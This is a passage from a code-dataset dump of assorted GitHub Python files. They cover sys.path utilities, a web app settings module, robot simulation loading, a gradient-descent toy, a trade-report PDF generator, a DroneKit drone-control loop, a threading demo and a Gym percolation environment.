list(template_dir.glob(\"*.pth.template\"))\n    templates_paths.sort()\n    template_path: Path\n    for template_path in templates_paths:\n        with template_path.open() as template_f:\n            template_str = template_f.read().strip()\n\n        filled_in_path = Template(template_str).substitute(substitution_map)\n        if filled_in_path in filled_in_path_to_file_map:\n            # There are duplicate files (ordered differently) that contain the same path to be\n            # added to sys.path. The first one wins, all other template files having the same\n            # paths for addition to sys.path are deleted.\n            print(\n                f\"{template_path.name}'s {filled_in_path} already represented with \"\n                f\"{filled_in_path_to_file_map[filled_in_path]}.\\n\\tDeleting {template_path.name}\"\n            )\n            template_path.unlink()\n            continue\n\n        filled_in_path_to_file_map[filled_in_path] = template_path.name\n\n        pth_templates[template_path] = filled_in_path\n\n    return pth_templates\n\n\ndef add_srcdirs_to_syspath(user_provided_project_dir: PurePath = None) -> None:\n    \"\"\"\n    Add all src directories under current working directory to sys.path. If caller did not supply\n    the /pathto/projectroot via 'user_provided_project_dir', attempt to\n    determine that, walk up ancestry to find a directory containing a 'src' directory. Walking up\n    allows for being within the 'tests' directory when initiating tests against modules under\n    'root/src'.\n\n    Searching for 'src' directories is NOT limited to finding the '<project root>/src' (and 'src'\n    directories under that '<project root>/src' directory)! All those will be found and added,\n    but also any other 'src' directory found under the <project root>/tests tree. 
This is desired\n    since git subprojects may be under 'tests' and their 'src' directories need to be\n    included.\n\n    :param user_provided_project_dir: root of project using add_srcdirs_to_syspath()\n\n    :return: None\n    \"\"\"\n    project_dir: Path = (\n        Path(user_provided_project_dir)\n        if user_provided_project_dir\n        else Path(get_project_root_dir())\n    )\n\n    prior_sys_path = sys.path.copy()\n\n    src: Path\n    for src in chain.from_iterable([project_dir.glob(\"src\"), project_dir.glob(\"tests/**/src\")]):\n        tested_src_str = str(src)\n        if src.is_dir() and tested_src_str not in sys.path:\n            sys.path.append(tested_src_str)\n\n    diff_path_strs: Set[str] = set(prior_sys_path).symmetric_difference(set(sys.path))\n    if len(diff_path_strs) > 0:\n        diff_path_strs = {Path(diff_path_str).as_posix() for diff_path_str in diff_path_strs}\n        print(f\"Added to sys.path: {sorted(diff_path_strs)}\")\n\n\ndef get_package_and_max_relative_import_dots(\n    module_name: str,\n) -> Tuple[Optional[str], Optional[str]]:\n    \"\"\"\n    Derive the fully-qualified package related to the already-imported module named by 'module_name'.\n    In addition, return the number of relative dots that can be used in that module before either of\n    the following occur:\n\n    ValueError: attempted relative import beyond top-level package\n    ImportError: attempted relative import beyond top-level package\n\n    :param module_name: module name of already-imported module\n    :return: fully-qualified package and max relative dots.\n    \"\"\"\n    target_module: ModuleType = sys.modules[module_name]\n    dots: str = \"\" if not target_module.__package__ else \".\"\n    dot_count: int = target_module.__package__.count(\".\") if target_module.__package__ else 0\n    dots: str = dots + \"\".join(\".\" for i in range(0, dot_count))\n    return target_module.__package__, dots\n","repo_name":"gkedge/runtime-syspath","sub_path":"src/runtime_syspath/syspath_utils.py","file_name":"syspath_utils.py","file_ext":"py","file_size_in_byte":11322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"13376273876","text":"\"\"\"Main configuration parameters for FastAPI and Lambda powertools\"\"\"\nimport logging\nfrom distutils.util import strtobool\nfrom os import getenv\nfrom pathlib import Path\n\nfrom starlette.config import Config\nfrom starlette.datastructures import Secret\n\nlogger = logging.getLogger(__name__)\n\n# Paths\nAPP_DIR = Path(__file__).resolve().parent\nENV_PATH = APP_DIR / \".env\"\nlogger.info(f\"Loading Django configs environment variables from {ENV_PATH}\")\n\nconfig = Config(env_file=ENV_PATH)\n\n# ======================= SETTINGS.PY =========================\n\n# General settings\nDEBUG: bool = bool(strtobool(getenv(\"DEBUG\", \"True\")))\nSECRET_KEY: Secret = getenv(\"SECRET_KEY\", config(\"SECRET_KEY\", cast=Secret))\nSTATIC_FILES_PATH: str = \"staticfiles/\"\nMEDIA_FILES_PATH: str = \"mediafiles/\"\n\n# Postgres\nPOSTGRES_HOST: str = getenv(\n    \"POSTGRES_HOST\", config(\"POSTGRES_HOST\", default=\"localhost\")\n)\nPOSTGRES_PASSWORD: Secret = getenv(\n    \"POSTGRES_PASSWORD\", config(\"POSTGRES_PASSWORD\", cast=Secret, default=\"postgres\")\n)\nPOSTGRES_DB: str = getenv(\"POSTGRES_DB\", config(\"POSTGRES_DB\", default=\"portfoliodb\"))\nPOSTGRES_PORT: int = getenv(\n    \"POSTGRES_PORT\", config(\"POSTGRES_PORT\", cast=int, default=5432)\n)\nPOSTGRES_USER: str = getenv(\n    \"POSTGRES_USER\", config(\"POSTGRES_USER\", default=\"postgres\")\n)\n\n# Redis Cache\n# Get from environment variable, for example if ElastiCache is 
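# Worked example for get_package_and_max_relative_import_dots() above, assuming
# the stdlib module is already imported so that it is present in sys.modules:
import importlib
importlib.import_module("email.mime.text")
pkg, dots = get_package_and_max_relative_import_dots("email.mime.text")
# pkg == "email.mime"; dots == ".." (one leading dot, plus one per dot in the package)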
used,\n# Otherwise assume Redis is running locally (e.g. in a docker container named \"redis\")\nREDIS_ENDPOINT: str = getenv(\n    \"REDIS_ENDPOINT\", config(\"REDIS_ENDPOINT\", default=\"localhost:6379\")\n)\nCACHE_TTL: int = int(getenv(\"CACHE_TTL\", \"60\"))\n\n# Static files served from AWS S3 Bucket\nSTATICFILES_BUCKET: str = getenv(\"STATICFILES_BUCKET\")\nAWS_REGION: str = getenv(\"AWS_REGION\", \"eu-west-2\")\nAWS_S3_CUSTOM_DOMAIN: str = getenv(\n    \"AWS_S3_CUSTOM_DOMAIN\", f\"s3.{AWS_REGION}.amazonaws.com/{STATICFILES_BUCKET}\"\n)  # E.g. tari.kitchen\n\n# Forward ContactForm emails to AWS SNS Topic\nSNS_TOPIC_ARN: str = getenv(\"SNS_TOPIC_ARN\", config(\"SNS_TOPIC_ARN\", default=None))\n\n# SES identity for email notifications\nSES_IDENTITY_ARN: str = getenv(\n    \"SES_IDENTITY_ARN\", config(\"SES_IDENTITY_ARN\", default=None)\n)\n","repo_name":"gbourniq/django-on-aws","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"}
{"seq_id":"721018230","text":"import os\n\nfrom compas.data import json_load\nfrom compas.robots import RobotModel, ToolModel\nfrom compas_fab.robots import Tool, CollisionMesh\n\nfrom pybullet_planning import LockRenderer, set_camera, wait_if_gui\nfrom npp.load import load_pybullet_with_robot, add_tool_to_client\n\n# Load Pybullet Client\nurdf_filename = os.path.join('robot', 'abb_crb15000_support', 'urdf', 'crb15000_5_95.urdf')\nsrdf_filename = os.path.join('robot', 'abb_crb15000_support', 'srdf', 'abb_crb15000_5_95.srdf')\nclient, robot, robot_uid = load_pybullet_with_robot(urdf_filename, srdf_filename, viewer=True)\n\n# Load Tool Model from json, create Tool, add it to Robot\ntool_json_path = os.path.join('tool', 'BioPrint901', 'BioPrint901.json')\ntool_model = json_load(tool_json_path)  #type: ToolModel\ntool = Tool.from_tool_model(tool_model)\ntool.link_name = 'tool0'\ntouch_links = ['tool0', 'flange', 'link_6']\nrobot.attach_tool(tool, touch_links=touch_links)\n\n# Add Tool to Pybullet Client\nurdf_package_path = os.path.join('tool', 'BioPrint901')\nadd_tool_to_client(client, robot, tool, urdf_package_path, touch_links=touch_links)\n\n# Load some Collision Meshes\ncollision_meshes_path = os.path.join('test', 'design', 'CollisionMesh1_PrintBed.json')\ncollision_meshes = json_load(collision_meshes_path)\nfor i, mesh in enumerate(collision_meshes):\n    cm = CollisionMesh(mesh, 'static_cm_%i' % i)\n    client.add_collision_mesh(cm, {})\n\nwait_if_gui()\npass","repo_name":"yck011522/planning_nonplanar_printing","sub_path":"test/pypullet_load_robot_and_tool.py","file_name":"pypullet_load_robot_and_tool.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"24746166882","text":"# (x-2)**2 = 0\r\nfrom tqdm import trange\r\n\r\nepoch = 1000\r\nlr = 0.09\r\nx = 5  # initial value; \"Kaiming init\" (a pun on Kaiming He)\r\nlabel = 0\r\n\r\n\r\nfor e in trange(epoch):\r\n\r\n    pre = (x - 2) ** 2\r\n    loss = (pre - label) ** 2\r\n\r\n    delta_x = 2*(pre - label) * (x - 2)  # chain rule gives 4*(pre-label)*(x-2); the dropped factor 2 is absorbed by lr\r\n    x = x - delta_x * lr\r\n\r\nprint(x)","repo_name":"shouxieai/A-series-of-NLP","sub_path":"NLP_深度学习_基础课程/2_梯度下降/梯度下降.py","file_name":"梯度下降.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"54"}
{"seq_id":"39947407927","text":"import os\nimport sys\nimport csv\nimport datetime as dt\nfrom fpdf import FPDF, YPos, XPos\nfrom decimal import 
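# Numeric sanity check for the hand-derived gradient in the snippet above:
# loss(x) = ((x-2)**2 - 0)**2, so dloss/dx = 2*((x-2)**2)*2*(x-2) = 4*(x-2)**3.
def loss(x):
    return ((x - 2) ** 2) ** 2
x0, eps = 5.0, 1e-6
numeric = (loss(x0 + eps) - loss(x0 - eps)) / (2 * eps)
analytic = 4 * (x0 - 2) ** 3  # == 108.0; both agree, confirming the derivation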
Decimal\n\nstartTime = dt.datetime.now()\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nfileDir = os.path.join(ROOT_DIR, 'data')\n\n\ndef main():\n    file_dir = get_path()\n    if file_dir != \"\":\n        records = get_data(file_dir)\n    else:\n        records = get_data(fileDir)\n    create_pdf(records)\n\n\ndef get_path():\n    file_dir = \"\"\n    if len(sys.argv) > 1:\n        print(\"File path entered\\n\")\n        fn = sys.argv[1]\n        if os.path.exists(fn):\n            file_dir = os.path.dirname(fn)\n            print(os.path.basename(fn))\n        else:\n            print(\"Invalid file path entered\\n--trying with default file path\\n\\n\")\n    else:\n        print(\"No file path entered\\n--trying with default file path\\n\\n\")\n    return file_dir\n\n\ndef get_data(file_dir):\n    try:\n        with open(os.path.join(file_dir, 'TRADE.csv'), 'r') as file:\n            csvreader = csv.reader(file)\n            trade_header = next(csvreader)\n            trade_records = [row for row in csvreader]\n\n        with open(os.path.join(file_dir, 'EX_TRADE.csv'), 'r') as file:\n            csvreader = csv.reader(file)\n            ex_trade_header = next(csvreader)\n            ex_trade_records = [row for row in csvreader]\n\n    except FileNotFoundError:\n        print(\"CSV files not found at directory: \" + file_dir)\n        sys.exit()\n\n    return trade_records, ex_trade_records, trade_header, ex_trade_header\n\n\ndef create_pdf(records):\n    trade_records = records[0]\n    ex_trade_records = records[1]\n\n    total_value_of_buys: float = 0\n    total_value_of_sells: float = 0\n    length_of_longest_comment: int = 0\n    longest_comment: str = ''\n    first_trade_start_time: dt = ''\n    last_trade_start_time: dt = ''\n    firms_with_trade_volume: {str: Decimal} = {}\n\n    trade_count: int = len(trade_records)\n    for row in trade_records:\n        if len(row[7]) > length_of_longest_comment:\n            length_of_longest_comment = len(row[7])\n            longest_comment = row[7]\n        if row[0] < first_trade_start_time or first_trade_start_time == '':\n            first_trade_start_time = row[0]\n        if row[0] > last_trade_start_time or last_trade_start_time == '':\n            last_trade_start_time = row[0]\n\n        if row[1] == 'B':\n            total_value_of_buys += float((row[3])) * float((row[4]))\n            if row[2] in firms_with_trade_volume:\n                firms_with_trade_volume[row[2]] += Decimal(row[3]) * Decimal(row[4])\n            if row[2] not in firms_with_trade_volume:\n                firms_with_trade_volume[row[2]] = Decimal(row[3]) * Decimal(row[4])\n        elif row[1] == 'S':\n            total_value_of_sells += float((row[3])) * float((row[4]))\n            if row[2] in firms_with_trade_volume:\n                firms_with_trade_volume[row[2]] += Decimal(row[3]) * Decimal(row[4])\n            if row[2] not in firms_with_trade_volume:\n                firms_with_trade_volume[row[2]] = Decimal(row[3]) * Decimal(row[4])\n\n    ex_trade_count: int = len(ex_trade_records)\n    for row in ex_trade_records:\n        if row[1] < first_trade_start_time or first_trade_start_time == '':\n            first_trade_start_time = row[1]\n        if row[1] > last_trade_start_time or last_trade_start_time == '':\n            last_trade_start_time = row[1]\n        if row[3] in firms_with_trade_volume:\n            firms_with_trade_volume[row[3]] += Decimal(row[4]) * Decimal(row[5])\n        if row[3] not in firms_with_trade_volume:\n            firms_with_trade_volume[row[3]] = Decimal(row[4]) * Decimal(row[5])\n        if row[2] == 'BUY_':\n            total_value_of_buys += float((row[4])) * float((row[5]))\n        elif row[2] == 'SELL':\n            total_value_of_sells += float((row[4])) * float((row[5]))\n\n    datetime_format = '%Y-%m-%d %H:%M:%S.%f'\n    first_trade_start_time: dt = dt.datetime.strptime(first_trade_start_time, datetime_format)\n    last_trade_start_time: dt = dt.datetime.strptime(last_trade_start_time, datetime_format)\n    trade_interval = (last_trade_start_time - 
first_trade_start_time).total_seconds()\n\n    firms_with_trade_volume = {k: v for k, v in sorted(firms_with_trade_volume.items(), key=lambda item: item[1])}\n    total_number_of_unique_firms = len(firms_with_trade_volume)\n\n    pdf = FPDF('P', 'mm', 'A4')\n    pdf.add_page()\n    pdf.add_font('Mono', '', ROOT_DIR + '/fonts/monospace.medium.ttf')\n    pdf.set_font('Mono', '', 20)\n    pdf.cell(0, 10, 'Trade Summary', new_x=XPos.CENTER, new_y=YPos.NEXT)\n    pdf.set_font('Mono', '', 14)\n    pdf.cell(0, 10, 'Number of trades: ' + str(trade_count), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, 'Number of ex trades: ' + str(ex_trade_count), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, 'Total value of buy trades: ' + str(total_value_of_buys), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, 'Total value of sell trades: ' + str(total_value_of_sells), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, 'Length of longest comment: ' + str(length_of_longest_comment), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, 'Longest comment: ' + longest_comment, new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, 'Trade interval: ' + str(trade_interval) + ' seconds', new_x=XPos.LMARGIN, new_y=YPos.NEXT)\n    pdf.ln(5)\n    pdf.set_font('Mono', '', 20)\n    pdf.cell(0, 10, 'List of Firms', new_x=XPos.CENTER, new_y=YPos.NEXT)\n    pdf.set_font('Mono', '', 14)\n    pdf.cell(0, 10, 'Total number of firms: ' + str(total_number_of_unique_firms), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    for firm in firms_with_trade_volume:\n        pdf.cell(0, 10, str(firm), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.ln(5)\n    pdf.set_font('Mono', '', 20)\n    pdf.cell(0, 10, 'Firm Summary', new_x=XPos.CENTER, new_y=YPos.NEXT)\n    pdf.set_font('Mono', '', 14)\n    pdf.cell(0, 10, 'Firm Name : Trade Volume', new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.cell(0, 10, '--------------------------------', new_x=XPos.LEFT, new_y=YPos.NEXT)\n    for firm in firms_with_trade_volume:\n        pdf.cell(0, 10, firm + ': ' + str(firms_with_trade_volume[firm]), new_x=XPos.LEFT, new_y=YPos.NEXT)\n    pdf.output('report.pdf')\n\n    print(\"Execution Completed\")\n    print(\"Execution Time: \" + str((dt.datetime.now() - startTime).total_seconds()) + \" seconds\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"sayuru-akash/python-scripting-training","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"26198091626","text":"from dronekit import connect, VehicleMode, Command\nfrom pymavlink import mavutil\nimport cv2\nimport numpy as np\nimport serial\nfrom time import sleep\nimport time\nimport argparse\nimport sys\n# Get argument from terminal\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--ftdi\", help = \"port to ftdi\")\nap.add_argument(\"-a\", \"--arduino\", help = \"port to arduino\")\nargs = vars(ap.parse_args())\nconnectionString = args[\"ftdi\"]\nCOM = args[\"arduino\"]\n\n\n\n# Connect to the Vehicle\nvehicle = connect(connectionString, wait_ready=True,baud=921600)\n#vehicle = connect('127.0.0.1:14550', wait_ready=True)\n\n# arduino connection\n#COM = 'COM5'# /dev/ttyACM0 (Linux)\nBAUD = 9600\nser = serial.Serial(COM, BAUD, timeout = .1)\nprint('Waiting for device')\nsleep(3)\nprint(ser.name)\n\n\n#variable\nstep = int(input(\"input step: \"))\n\n#functions\ndef send_nav_velocity(velocity_x, velocity_y, velocity_z):\n    # create the SET_POSITION_TARGET_LOCAL_NED command\n    msg = 
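# The per-firm accumulation in the trade-report script above can be expressed
# more compactly with collections.defaultdict; a sketch, assuming rows shaped
# like the TRADE.csv rows parsed above:
from collections import defaultdict
from decimal import Decimal
firms_with_trade_volume = defaultdict(Decimal)  # missing firms start at Decimal(0)
for row in trade_records:
    firms_with_trade_volume[row[2]] += Decimal(row[3]) * Decimal(row[4])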
vehicle.message_factory.set_position_target_local_ned_encode(\n        0,       # time_boot_ms (not used)\n        0, 0,    # target system, target component\n        mavutil.mavlink.MAV_FRAME_LOCAL_NED, # frame\n        0b0000111111000111, # type_mask (only speeds enabled)\n        0, 0, 0, # x, y, z positions (not used)\n        velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s\n        0, 0, 0, # x, y, z acceleration (not used)\n        0, 0)    # yaw, yaw_rate (not used)\n    # send command to vehicle\n    vehicle.send_mavlink(msg)\n    vehicle.flush()\n    # x motion here is y in the real world and vice versa\n\n\ndef servo(channel, sv):\n    # input the message\n    msg = vehicle.message_factory.command_long_encode(0, 0,    # target system, target component\n                                                      mavutil.mavlink.MAV_CMD_DO_SET_SERVO,\n                                                      0,  # confirmation\n                                                      channel,  # relay pin on AUX OUT 3\n                                                      sv,  # pwm value\n                                                      0, 0, 0, 0, 0)  # params 1 ~ 5 not used\n    # send command to vehicle\n    vehicle.send_mavlink(msg)\n    vehicle.flush()\n\ndef parseArduino():\n    val = str(ser.readline().decode().strip())  # Capture serial output as a decoded string\n    valA = val.split(\",\")\n    return valA\n    #print(valA, end=\"\\r\", flush=True)\n\ndef arm_and_takeoff_with_NED(x,y,x_tujuan,y_tujuan,z_tujuan):\n    global step\n    vel_x = 0\n    vel_y = 0\n    vel_z = 0\n    print(\"Basic pre-arm checks\")\n    print(\"Arming\")\n    vehicle.armed = True\n    while not vehicle.armed:\n        print(\" Waiting for arming...\")\n        time.sleep(1)\n    if x > x_tujuan + 10:\n        vel_x = -0.005\n        print(\"moving left\")\n    elif x < x_tujuan - 10:\n        vel_x = 0.005\n        print(\"moving right\")\n    if y > y_tujuan + 10:\n        vel_y = 0.005\n        print(\"moving forward\")\n    elif y < y_tujuan - 10:\n        vel_y = -0.005\n        print(\"moving backward\")\n    if vehicle.rangefinder.distance < z_tujuan * 0.95:\n        vel_z = -0.5\n        print(\"altitude: \" + str(vehicle.rangefinder.distance))\n    elif vehicle.rangefinder.distance >= z_tujuan * 0.95:\n        vel_z = 0\n        print(\"target altitude reached\")\n    if y_tujuan - 10 <= y <= y_tujuan+10 and x_tujuan-10 <= x <= x_tujuan+10:\n        print(\"arrived\")\n        vel_y = 0\n        vel_x=0\n        step = step+1\n        sleep(5)\n    send_nav_velocity(vel_x, vel_y, vel_z)\n\ndef arm_and_takeoff(aTargetAltitude):\n    global step\n    print(\"Basic pre-arm checks\")\n    # Don't let the user try to arm until autopilot is ready\n    while not vehicle.is_armable:\n        print(\" Waiting for initialisation...\")\n        time.sleep(1)\n\n    print(\"Arming\")\n    # Copter should arm in GUIDED mode\n    vehicle.armed = True\n\n    while not vehicle.armed:\n        print(\" Waiting for arming...\")\n        time.sleep(1)\n\n    print(\"Take off!\")\n    vehicle.simple_takeoff(aTargetAltitude)  # Take off to target altitude\n\n    # Wait until the vehicle reaches a safe height before processing the goto (otherwise the command\n    # after Vehicle.simple_takeoff will execute immediately).\n    while True:\n        print(\" Altitude: \", vehicle.location.global_relative_frame.alt)\n        if vehicle.location.global_relative_frame.alt >= aTargetAltitude * 0.95:  # Trigger just below target alt.\n            print(\"target altitude reached\")\n            step = 1\n            break\n        time.sleep(1)\n\ndef moveLidar_sama(x,y,x_tujuan,y_tujuan):\n    # TODO: add QR-code camera reading\n    global step\n    vel_x = 0\n    vel_y = 0\n    vel_z = 0\n    if x > x_tujuan + 10:\n        vel_x = -0.005\n        print(\"moving left\")\n    elif x < x_tujuan - 10:\n        vel_x = 0.005\n        print(\"moving right\")\n    if y > y_tujuan + 10:\n        vel_y = 0.005\n        print(\"moving forward\")\n    elif y < y_tujuan - 10:\n        vel_y = -0.005\n        print(\"moving backward\")\n    if y_tujuan - 10 <= y <= y_tujuan+10 and x_tujuan-10 <= x <= x_tujuan+10:\n        print(\"arrived\")\n        vel_y = 0\n        vel_x=0\n        step = step+1\n        sleep(5)\n\n    send_nav_velocity(vel_x, vel_y, vel_z)\n\ndef 
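# Decoding the type_mask used by send_nav_velocity() above: in the MAVLink
# POSITION_TARGET convention a SET bit means that field is IGNORED, so this
# mask keeps only the three velocity terms active.
MASK = 0b0000111111000111
fields = ["x", "y", "z", "vx", "vy", "vz", "ax", "ay", "az", "force", "yaw", "yaw_rate"]
used = [f for i, f in enumerate(fields) if not (MASK >> i) & 1]
# used == ['vx', 'vy', 'vz']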
moveLidar_tinggi(x,y,x_tujuan,y_tujuan,z_tujuan):\n    # TODO: add QR-code camera reading\n    global step\n    vel_x = 0\n    vel_y = 0\n    vel_z = 0\n    if vehicle.location.global_relative_frame.alt < z_tujuan+0.02:\n        print(\"increasing altitude\")\n        vel_z = 0.01\n    else:\n        if x > x_tujuan + 10:\n            vel_x = -0.005\n            print(\"moving left\")\n        elif x < x_tujuan - 10:\n            vel_x = 0.005\n            print(\"moving right\")\n        if y > y_tujuan + 10:\n            vel_y = 0.005\n            print(\"moving forward\")\n        elif y < y_tujuan - 10:\n            vel_y = -0.005\n            print(\"moving backward\")\n        if y_tujuan - 10 <= y <= y_tujuan + 10 and x_tujuan - 10 <= x <= x_tujuan + 10:\n            print(\"arrived\")\n            vel_y = 0\n            vel_x = 0\n            step = step + 1\n            sleep(5)\n\n    send_nav_velocity(vel_y, vel_x, vel_z)\n\n# def moveLidar_drop1(x,y,x_tujuan,y_tujuan):\n#     global step\n#     if vehicle.mode.name != 'GUIDED':\n#         vehicle.mode = VehicleMode(\"GUIDED\")\n#     if x > x_tujuan:\n#         vel_x = -0.1\n#     if x <= x_tujuan:\n#         vel_x = 0\n#         x_sampe = 1\n#     if y > y_tujuan:\n#         vel_y = 0.1\n#     if y <= y_tujuan:\n#         vel_y = 0\n#         y_sampe = 1\n#     if x_sampe == 1 & y_sampe == 1:\n#         print(\"arrived at location 1\")\n#         step = 2\n#\n#     send_nav_velocity(vel_x, vel_y, 0)\n#\n# def moveLidar_drop2(x,y,x_tujuan,y_tujuan):\n#     global step\n#     if vehicle.mode.name != 'GUIDED':\n#         vehicle.mode = VehicleMode(\"GUIDED\")\n#     if x < x_tujuan:\n#         vel_x = 0.2\n#     if x >= x_tujuan:\n#         vel_x = 0\n#         x_sampe = 1\n#     if y > y_tujuan:\n#         vel_y = 0.1\n#     if y <= y_tujuan:\n#         vel_y = 0\n#         y_sampe = 1\n#     if x_sampe == 1 & y_sampe == 1:\n#         print(\"arrived at location 2\")\n#         step = 3\n#     send_nav_velocity(vel_x, vel_y, 0)\n#\n#\n# def moveLidar_home(x,y,x_tujuan,y_tujuan):\n#     global step\n#     if vehicle.mode.name != 'GUIDED':\n#         vehicle.mode = VehicleMode(\"GUIDED\")\n#     if x < x_tujuan:\n#         vel_x = 0.2\n#     if x >= x_tujuan:\n#         vel_x = 0\n#         x_sampe = 1\n#     if y < y_tujuan:\n#         vel_y = 0.2\n#     if y >= y_tujuan:\n#         vel_y = 0\n#         y_sampe = 1\n#     if x_sampe == 1 & y_sampe == 1:\n#         print(\"arrived home\")\n#         step = 4\n#     send_nav_velocity(vel_x, vel_y, 0)\n\ndef moveLidar_land(x,y,x_tujuan,y_tujuan):\n    global step\n    vel_x = 0\n    vel_y = 0\n    vel_z = 0\n    if x > x_tujuan + 10:\n        vel_x = -0.005\n        print(\"moving left\")\n    elif x < x_tujuan - 10:\n        vel_x = 0.005\n        print(\"moving right\")\n    if y > y_tujuan + 10:\n        vel_y = 0.005\n        print(\"moving forward\")\n    elif y < y_tujuan - 10:\n        vel_y = -0.005\n        print(\"moving backward\")\n    if y_tujuan - 10 <= y <= y_tujuan+10 and x_tujuan-10 <= x <= x_tujuan+10:\n        print(\"arrived at landing spot\")\n        vel_y = 0\n        vel_x=0\n        if vehicle.rangefinder.distance > 0.3 * 0.95:\n            vel_z = 0.1\n            print(\"altitude: \" + str(vehicle.rangefinder.distance))\n        elif vehicle.rangefinder.distance <= 0.3 * 0.95:\n            vel_z = 0\n            print(\"entering LAND mode\")\n            vehicle.mode=VehicleMode(\"LAND\")\n            step = step + 1\n            sleep(5)\n    send_nav_velocity(vel_x, vel_y, vel_z)\n\n\nwhile True:\n    drone_position = parseArduino()\n    x = int(drone_position[0])\n    y = int(drone_position[1])\n    print(x,y)\n    if vehicle.mode==VehicleMode(\"GUIDED\"):\n        if step == 0:\n            arm_and_takeoff_with_NED(x,y,632,273,1)  # x, y, target takeoff altitude\n        elif step == 1:\n            print(\"going to location 1\")\n            moveLidar_sama(x, y, 408, 238)\n        elif step == 2:\n            print(\"going to launch\")\n            moveLidar_land(x, y, 632, 273)\n        else:\n            break\n    #else:\n        #break\n","repo_name":"rasyadmar/moving-drone-with-python","sub_path":"lomba_lidar.py","file_name":"lomba_lidar.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"32831550923","text":"import threading\nimport time\n\n\nclass Compte:\n\n    def __init__(self):\n        
self.balance = 100  # shared data\n    \n    def maj(self, transaction, montant):\n        print(f'{transaction} thread update...{montant}')\n        local_copy = self.balance\n        local_copy += montant\n        time.sleep(1)\n        self.balance = local_copy\n        print(f'{transaction} thread done...')\n\n\nif __name__ == '__main__':\n    compte = Compte()\n    th = []\n    print(f'starting balance {compte.balance}')\n    for transaction, montant in [('depot', 50), ('retrait', -150)]:\n        # t = threading.Thread(target=compte.maj,args=[transaction, montant])\n        # t.start()\n        # th.append(t)\n        compte.maj(transaction, montant)\n    # for t in th:\n    #     t.join()\n    print(f'final balance {compte.balance}')\n","repo_name":"ISSAE/NFP103","sub_path":"A03/0303-compte.py","file_name":"0303-compte.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"25982315900","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\n\nfrom gym_percolation.envs.percolation_grid import PercolationGrid\n\nimport numpy as np\nimport math\n \nclass PercolationEnv(gym.Env): \n    metadata = {\n        \"render.modes\": [\"human\", \"rgb_array\"],\n    }\n    \n    @property\n    def action_space(self):\n        actions = list()\n\n        '''\n        # Very naive heuristic => select available cells\n        for i in range(self.grid_view.grid.states.shape[0]):\n            for j in range(self.grid_view.grid.states.shape[1]):\n                if self.grid_view.grid.states[i,j] == self.grid_view.grid.STATES['Empty']:\n                    actions.append({'x':i, 'y':j})\n        '''\n\n        # A little better one => pick cells that have the potential to bridge other cells\n        cellByClusters = dict() \n        for i in range(self.grid_view.grid.states.shape[0]):\n            for j in range(self.grid_view.grid.states.shape[1]):\n                if self.grid_view.grid.states[i,j] == self.grid_view.grid.STATES['Empty']:\n                    # Get the angle to each neighbour and look for clusters by sorting on it\n                    angleDict = dict()\n                    for m,n in [(1,0), (1,1), (0,1), (-1,1), (-1,0), (-1, -1), (0, -1), (1, -1)]:\n                        if 0 <= i+m < self.grid_view.grid_size[0] and 0 <= j+n < self.grid_view.grid_size[1]:\n                            angle = math.atan2(n, m) \n                            angleDict[angle] = self.grid_view.grid.states[i+m,j+n]\n\n                    # Keep coordinates by the number of disjoint clusters\n                    emptyNum = self.grid_view.grid.STATES['Empty']\n                    stateVec = [d[1] for d in sorted(angleDict.items(), key=lambda x: x[0])]\n                    nc = 1 if stateVec[0] != emptyNum else 0\n                    for c in range(1,len(stateVec)):\n                        if stateVec[c] != emptyNum and stateVec[c-1] == emptyNum:\n                            nc += 1\n                    if len(stateVec) == 8 and stateVec[0] == stateVec[-1] and stateVec[0] != emptyNum:\n                        nc -= 1\n\n                    if nc not in cellByClusters:\n                        cellByClusters[nc] = list()\n                    cellByClusters[nc].append({'x':i, 'y':j})\n\n        # Return the largest ones\n        if len(cellByClusters) > 0:\n            #maxC = max(list(cellByClusters.keys()))\n            #actions = cellByClusters[maxC]\n            actions = list()\n            for key in cellByClusters.keys():\n                if key == 0: continue\n                actions.extend(cellByClusters[key])\n        else:\n            actions = list()\n\n        return actions\n\n    @property\n    def observation_space(self):\n        observations = list()\n        return observations\n\n    def __init__(self, gridObject=None, enable_render=True, np_seed=None):\n\n        self.viewer = None\n        self.enable_render = enable_render\n\n        # Simulation related variables.\n        self.seed()\n\n        self.grid_view = gridObject\n        self.grid_size = self.grid_view.grid_size\n\n        # initial condition\n        self.state = None\n        self.steps_beyond_done = None\n\n        # Just need to initialize the relevant attributes\n        self.reset()\n        self.configure()\n\n    def configure(self, 
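# A minimal fix sketch for the race in Compte.maj above: serialise the
# read-modify-write with a Lock (a hypothetical variant, not the original code).
import threading
class CompteSafe:
    def __init__(self):
        self.balance = 100
        self._lock = threading.Lock()
    def maj(self, transaction, montant):
        with self._lock:  # only one thread may update the balance at a time
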